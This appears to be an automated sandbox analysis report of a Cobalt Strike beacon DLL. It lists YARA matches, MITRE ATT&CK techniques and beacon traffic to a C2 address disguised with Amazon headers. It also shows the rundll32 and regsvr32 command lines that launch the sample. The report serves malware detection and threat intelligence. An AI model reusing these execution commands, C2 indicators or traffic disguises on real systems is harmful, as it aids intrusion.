Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: FireEye
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown

Source: 8082-x86.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Source: 8082-x86.dll, type: SAMPLE	Matched rule: CobaltStrike_Resources_Artifact32_v3_14_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/artifact32{.dll,.exe,big.exe,big.dll,bigsvc.exe} signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x and resources/artifact32uac.dll for v3.14 and v4.0, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 888bae8d89c03c1d529b04f9e4a051140ce3d7b39bc9ea021ad9fc7c9f467719
Source: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Sleeve_Beacon_Dll_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s sleeve/beacon.dll Versions 4.3 and 4.4, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, rs2 = 78a6fbefa677eeee29d1af4a294ee57319221b329a2fe254442f5708858b37dc, hash = 51490c01c72c821f476727c26fbbc85bdbc41464f95b28cdc577e5701790845f
Source: 00000000.00000003.435119690.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000003.435119690.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.436145653.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000003.436145653.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.435087941.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000003.435087941.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.581071660.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000003.581071660.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.511799758.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000003.511799758.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000002.620198943.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000002.620198943.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Sleeve_BeaconLoader_VA_x86_o_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s sleeve/BeaconLoader.VA.x86.o (VirtualAlloc) Versions 4.3 through at least 4.6, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR	Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration

Source: C:\Windows\System32\loaddll32.exe	Section loaded: wwanmm.dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00953410	0_2_00953410
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009702D8	0_2_009702D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009614EB	0_2_009614EB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00966514	0_2_00966514
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00973550	0_2_00973550
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00953541	0_2_00953541
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00973B20	0_2_00973B20
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00972CD0	0_2_00972CD0

Source: C:\Windows\System32\loaddll32.exe

Code function: String function: 00966ADC appears 37 times

Source: 8082-x86.dll	ReversingLabs: Detection: 87%
Source: 8082-x86.dll	Virustotal: Detection: 70%

Source: 8082-x86.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009578FB _memset,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,FindCloseChangeNotification,

0_2_009578FB

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\8082-x86.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x86.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllGetClassObject
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllMain
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x86.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllGetClassObject	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01

Source: classification engine

Classification label: mal100.troj.winDLL@14/0@0/1

Source: 8082-x86.dll

Static PE information: Image base 0x6bac0000 > 0x60000000

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE71FA push ss; ret	0_3_00CE720F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE13E7 push FFFFFFC0h; ret	0_3_00CE13F3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CEB4DA push esi; ret	0_3_00CEB4DD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CEB59F push esi; retf	0_3_00CEB59E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CEB59F push esi; iretd	0_3_00CEB5FE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CEB556 push esi; retf	0_3_00CEB59E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0527 push FFFFFF99h; ret	0_3_00CE0533
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE06D9 push eax; ret	0_3_00CE06E6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE166C pushfd ; ret	0_3_00CE1672
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE4668 push edi; ret	0_3_00CE4677
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0634 push eax; ret	0_3_00CE063D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE07CD push ecx; ret	0_3_00CE07D4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE07C4 push ecx; ret	0_3_00CE07CB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE17DE push edx; ret	0_3_00CE17EF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE078D push ecx; ret	0_3_00CE0797
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE179A pushfd ; ret	0_3_00CE17B3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE07BB push ecx; ret	0_3_00CE07C2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0756 push ecx; ret	0_3_00CE0764
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0766 push ecx; ret	0_3_00CE0770
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0774 push ecx; ret	0_3_00CE077F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE68E7 push esp; ret	0_3_00CE68EF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE18A6 push FFFFFFC2h; ret	0_3_00CE1891
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE1867 push FFFFFFC2h; ret	0_3_00CE1891
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE087E push edx; ret	0_3_00CE0887
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0834 push edx; ret	0_3_00CE0853
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0972 push ebx; ret	0_3_00CE0978
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0917 push edx; ret	0_3_00CE091D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE9ADA push FFFFFFC3h; ret	0_3_00CE9AF9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE1A91 pushad ; iretd	0_3_00CE1A93
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE1A7D pushad ; retf	0_3_00CE1A86
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE4B84 push ebx; ret	0_3_00CE4B85

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x86.dll

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49689

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-18003

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 31329	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 34974	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 31989	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE9004 mov eax, dword ptr fs:[00000030h]		0_3_00CE9004
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE8374 mov eax, dword ptr fs:[00000030h]		0_3_00CE8374

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009558DD GetUserNameA,_strrchr,__snprintf,

0_2_009558DD

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR
Source: Yara match	File source: 8082-x86.dll, type: SAMPLE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Virtualization/Sandbox Evasion	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Process Injection	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	1 System Owner/User Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Regsvr32	LSA Secrets	2 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	112 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Rundll32	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

